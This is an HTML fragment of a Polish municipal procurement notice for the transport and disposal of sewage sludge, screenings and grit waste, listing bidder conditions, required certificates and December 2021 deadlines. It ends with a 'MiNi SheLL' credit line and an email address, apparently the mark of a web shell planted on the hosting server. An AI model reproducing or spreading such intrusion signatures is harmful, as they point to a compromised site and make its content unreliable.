udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:<br/>a/ nie podlegają wykluczeniu<br/>b/ spełniają warunki udziału w postępowaniu<br/>Ocena spełnienia przez wykonawcę warunków udziału w postępowaniu zostanie dokonana na podstawie:<br/>- zdolności do występowania w obrocie gospodarczym<br/>- uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów,<br/>- sytuacji ekonomicznej i finansowej,<br/>- zdolności technicznej lub zawodowej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a/ ZDOLNOŚCI DO WYSTEPOWANIA W OBROCIE GOSPODARCZYM<br/>Oświadczenie Wykonawcy. Zamawiający nie wymaga podmiotowych środków dowodowych w tym zakresie.<br/>b/UPRAWNIEŃ DO PROWADZENIA OKRESLONEJ DZIAŁALNOŚCI GOSPODARCZEJ LUB ZAWODOWEJ, O ILE WYNIKA TO Z ODRĘBNYCH PRZEPISÓW<br/>a/ uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej.<br/>Wykonawca spełni warunek, jeżeli wykaże, że:<br/>- posiada aktualne zezwolenie na transport i zagospodarowanie odpadów o kodzie 19 08 05, 19 08 02, 19 09 99. W przypadku zagospodarowania komunalnych osadów ściekowych o kodzie 19 08 05 poprzez rolnicze wykorzystanie zgodnie z art. 96 ustawy o odpadach należy przedstawić dokument wskazujący miejsce zagospodarowania;<br/>- posiada decyzję w zakresie odzysku lub unieszkodliwienia odpadów ustabilizowanych komunalnych osadów ściekowych, skratek i zawartości piaskowników, ze wskazaniem miejsca prowadzenia ww działalności i stosowanej metody odzysku i dołączy do oferty kopię decyzji. W przypadku posiadania zezwolenia na zbieranie odpadów o kodzie 19 08 01 skratki oraz 19 08 02 zawartość piaskowników należy dodatkowo dołączyć do oferty umowę z instalacją posiadająca niezbędne decyzje administracyjne na przetwarzanie tych odpadów. <br/><br/>c/ SYTUACJI FINANSOWEJ LUB EKONOMICZNEJ<br/>Oświadczenie Wykonawcy. Zamawiający nie wymaga podmiotowych środków dowodowych w tym zakresie.<br/>D/ ZDOLNOŚCI TECHNICZNEJ LUB ZAWODOWEJ<br/>Oświadczenie Wykonawcy. Zamawiający nie wymaga podmiotowych środków dowodowych w tym zakresie.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełnienia przez wykonawcę braku podstaw wykluczenia wykonawcy z udziału w postepowaniu Zamawiający wymaga od Wykonawców następujących podmiotowych środków dowodowych dotyczących:<br/>NIE PODLEGANIA WYKLUCZENIUNA PODSTAWIE ART. 24 UST. 1 PZP<br/>- OŚWIADCZENIE WYKONAWCY NA PODSTAWIE ART. 125 UST. 1<br/>- OŚWIADCZENIE Wykonawcy, w zakresie art. 108 ust. 1 pkt. 5 ustawy o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 roku o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postepowaniu, albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej,<br/>- Odpis lub informacja z KRS lub z centralnej ewidencji i informacji o działalności gospodarczej, w zakresie art. 109 ust. 1 pkt. 4 ustawy jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji,<br/>- Zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, Ze wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt. 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem wykonawca składa dokument potwierdzający, że odpowiednio przed upływem terminu składania ofert dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności,<br/>- Zaświadczenie albo inny dokument właściwego oddziału regionalnego lub właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt. 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne i zdrowotne wraz z zaświadczeniem wykonawca składa dokument potwierdzający, że odpowiednio przed upływem terminu składania ofert dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie tych należności.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>W przypadku składania oferty wspólnie wykonawcy ustanawiają Pełnomocnika, który będzie upoważniony do reprezentowania ich w postepowaniu o udzielenie zamówienia lub reprezentowania ich w postepowaniu i zawarcia umowy w sprawie zamówienia publicznego w ich imieniu.<br/>4.W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenia składa każdy z wykonawców. Dokumenty te potwierdzają spełnianie warunków udziału w postepowaniu oraz brak podstaw wykluczenia w zakresie, w jakim każdy z wykonawców wykazuje spełnienie warunków udziału w postepowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany zostały opisane we wzorze umowy stanowiącym załacznik do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-28 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">2.	W niniejszym postepowaniu komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu miniportalu https://miniportal.uzp.gov.pl, ePUAPu https://epuap.gov.plwsp/portal oraz poczty elektronicznej e mail: inwestycje@stanislawow.pl (nie dotyczy składania oferty oraz dokumentów składanych wraz z ofertą).</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-28 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com